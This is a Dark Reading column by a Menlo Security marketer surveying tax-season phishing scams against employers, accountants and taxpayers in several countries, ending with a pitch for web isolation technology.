Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


// // //
12:30 PM
Jay Kelley
Jay Kelley
News Analysis-Security Now

Nothing's Certain, Except Death, Taxes... & Phishing

Recent phishing attacks could mean that a tax bill is the least of your government revenue issues.

"But in this world, nothing can be said to be certain, except death and taxes." – Benjamin Franklin

Many businesses and their employees recently fell victim to a very successful spear-phishing attack that duped an unsuspecting employee into sending the company's W-2s to a company executive, who emailed the employee and asked for the W-2s to address a "financial emergency." Instead, the email was a spear-phishing attack, with all the employees' W-2s going directly into the hands of the attacker or attackers, who now have the names, addresses, Social Security Numbers (SSN), wages and tax information for all of the company's employees -- a treasure trove of information that coud lead to false tax claims, identity theft and other financial catastrophes.

But, the IRS began warning accountants and tax professionals in January that they, too, were under attack by hackers, and not with just one scam, but at least two.

In the first scam, an accountant or tax professional received an email from a prospective client -- really the attacker -- stating that they were looking to hire someone to prepare their personal or business taxes. The attacker might use the name of a friend or associate, who has also been hacked, as a reference in their email, to avoid suspicion and ease the mind of the accountant or tax professional.

The attacker would include a link to a website, or an Adobe Acrobat or other file attachment with an embedded link, claiming that the link led to their financial information. Once the accountant or tax pro clicked the link, the website would pilfer the accountant's or tax pro's email address, user name, password and likely much more.

The attackers begin the cycle all over again by sending out another phishing email to the clients of the accountant or tax professional they initially attacked. After stealing their email address, the attacker asks for the clients to click on a link in the email or on an attachment to re-enter their financial information or their user name and password for the hacked accountant’s or tax pro’s online software or website. When a client falls for this phishing attack, their information wis pinched, and it's likely their tax return will end up being claimed by the attacker.

Yet another phishing attack forced the Internal Revenue Service to send yet another alert out to accountants and tax professionals. In this attack, the attackers sent an email to an accountant or tax professional indicating that they have been locked out of their tax preparation software due to "security issues."

Under tight deadlines and tremendous pressure, this is the last thing the accountant or tax professional needed to see! The phishing email included a link that would supposedly unlock the software for the accountant or tax pro. Desperate to ensure that their tax preparation software was secure and accessible, the accountant or tax professional would click on the link provided with no questions asked or without any suspicion.

Unfortunately, the link led to a phishing website requesting the accountant's or tax professional's user name and password for the tax preparation software, so that the software could be unlocked. Upon entering their user name and password, the attacker would have all the information needed to break into the tax preparation software and steal the financial and tax information for all the accountant's or tax pro's clients!

Of course, tax phishing scams are not just limited to the United States. In Canada, for instance, attackers have been sending phishing emails posing as the Canada Revenue Agency (CRA), informing the recipient of the email that, due to a recalculation of their taxes from the prior year, they are either due a refund, or should be receiving more in their tax return. The link in the email leads to a bogus website in which the user is asked to re-enter their personal and financial data, including, in some cases, their user name, passwords and to even answer questions like their mother's maiden name. This data is then used by the attackers to access the user's tax refund, to access their finances and bank accounts, and to rob them.

In Australia, attackers pose as the Australian Tax Office (ATO), sending the unsuspecting recipient what they may believe is an email to access their next Online Activity Statement, or may dupe them into believing that they are due a refund or an additional amount in their tax refund, that they owe additional taxes, or to reconfirm or update their tax file number. If the user clicks on the link in the email and provides their personal and financial information, their accounts are pillaged and personal information is quickly posted for sale on the Dark Web.

The United Kingdom is not immune to these phishing attacks, either. The phishers send unsuspecting users a "tax refund notification" email, posing as Her Majesty's Revenue & Customs (HMRC), with a link to a false webpage so that they may enter their banking information, so that their phony "tax refund" may be deposited for them automatically. Only the poor user doesn't get a tax refund but, instead, loses their hard-earned money to the unscrupulous phishing attacker.

Having personally received a spear phishing email several years ago claiming to be from the IRS, signed by a supposed IRS agent, but with several misspellings and grammatical issues as well as an outdated IRS logo on the "official" email letterhead -– in addition to being "vished" by several calls and "smished" by a few SMS texts from the "Internal Revenue System" to my cellphone, all with a Washington, DC area code (202) and with a caller ID of "I.R.S.," all threatening me with arrest if my credit card number wasn't provided for payment of my supposed back taxes –- it becomes quickly clear that, if the person receiving the threatening emails, calls and texts is not in or familiar with cybersecurity, they can easily be fooled and feel threatened to immediately turn over their personal or financial information.

So, what can be done to halt these attacks on accountants and tax professionals, and, ultimately, you and your organization's tax and financial data?

In the US, IRS and other international tax agencies try to emphasize to taxpayers that they will not typically initiate contact via email or text message requesting personal or financial information. Taxpayers and tax professionals alike should never open an attachment or link from an unknown or suspicious source and should be aware of email messages with misspellings and awkward grammatical structure. Still, there needs to be other, stronger, fail-safe measures to ensure tax professional and taxpayer security.

Existing email security software may catch some of these phishing attacks, but it's unlikely, based on their own capture statistics, that they will catch sophisticated phishing attacks. And, it takes only one, single, successful phishing attack to gain access to the tax, financial and even personal information for every client that an accountant or tax professional has, ruining their reputation and possibly destroying a business that took years to create.

The only way to ensure that all email-based phishing attacks are stopped before they can happen is with isolation.

Isolating all web access ensures that all email-based phishing attacks requiring users to click on a link to initiate an attack won't be successful. That's because, once the user clicks on the link in the phishing email or attachment, their web access is isolated; the selected web page is executed in the isolation platform; the web page proxied; and only a safe, clean, malware-free web page is returned to and rendered for the user. Some isolation platforms can even eliminate credential theft by allowing websites to be rendered in read-only mode, preventing users from entering their name, password or any other sensitive information into a web form.

So, if you have deployed isolation for the accountant or tax professional you support, then you can be assured that phishing attacks targeting their sensitive financial data and their customers' tax information will be stopped cold, maintaining their customers' financial security and the reputation and integrity of their business. But, if you haven't, you might want to do at least an informal security audit before you have them file your taxes.

Jay Kelley is Senior Product Marketing Manager for Menlo Security. Jay also co-authored the book Network Access Control for Dummies published by John Wiley & Sons in 2009.

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
I Smell a RAT! New Cybersecurity Threats for the Crypto Industry
David Trepp, Partner, IT Assurance with accounting and advisory firm BPM LLP,  7/9/2021
Attacks on Kaseya Servers Led to Ransomware in Less Than 2 Hours
Robert Lemos, Contributing Writer,  7/7/2021
It's in the Game (but It Shouldn't Be)
Tal Memran, Cybersecurity Expert, CYE,  7/9/2021
Register for Dark Reading Newsletters
White Papers
Current Issue
Everything You Need to Know About DNS Attacks
It's important to understand DNS, potential attacks against it, and the tools and techniques required to defend DNS infrastructure. This report answers all the questions you were afraid to ask. Domain Name Service (DNS) is a critical part of any organization's digital infrastructure, but it's also one of the least understood. DNS is designed to be invisible to business professionals, IT stakeholders, and many security professionals, but DNS's threat surface is large and widely targeted. Attackers are causing a great deal of damage with an array of attacks such as denial of service, DNS cache poisoning, DNS hijackin, DNS tunneling, and DNS dangling. They are using DNS infrastructure to take control of inbound and outbound communications and preventing users from accessing the applications they are looking for. To stop attacks on DNS, security teams need to shore up the organization's security hygiene around DNS infrastructure, implement controls such as DNSSEC, and monitor DNS traffic
Flash Poll
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2023-05-26
Craft is a CMS for creating custom digital experiences. Cross site scripting (XSS) can be triggered by review volumes. This issue has been fixed in version 4.4.7.
PUBLISHED: 2023-05-26
Django-SES is a drop-in mail backend for Django. The django_ses library implements a mail backend for Django using AWS Simple Email Service. The library exports the `SESEventWebhookView class` intended to receive signed requests from AWS to handle email bounces, subscriptions, etc. These requests ar...
PUBLISHED: 2023-05-26
Highlight is an open source, full-stack monitoring platform. Highlight may record passwords on customer deployments when a password html input is switched to `type="text"` via a javascript "Show Password" button. This differs from the expected behavior which always obfuscates `ty...
PUBLISHED: 2023-05-26
Craft is a CMS for creating custom digital experiences on the web.The platform does not filter input and encode output in Quick Post validation error message, which can deliver an XSS payload. Old CVE fixed the XSS in label HTML but didn’t fix it when clicking save. This issue was...
PUBLISHED: 2023-05-26
GDSDB infinite loop in Wireshark 4.0.0 to 4.0.5 and 3.6.0 to 3.6.13 allows denial of service via packet injection or crafted capture file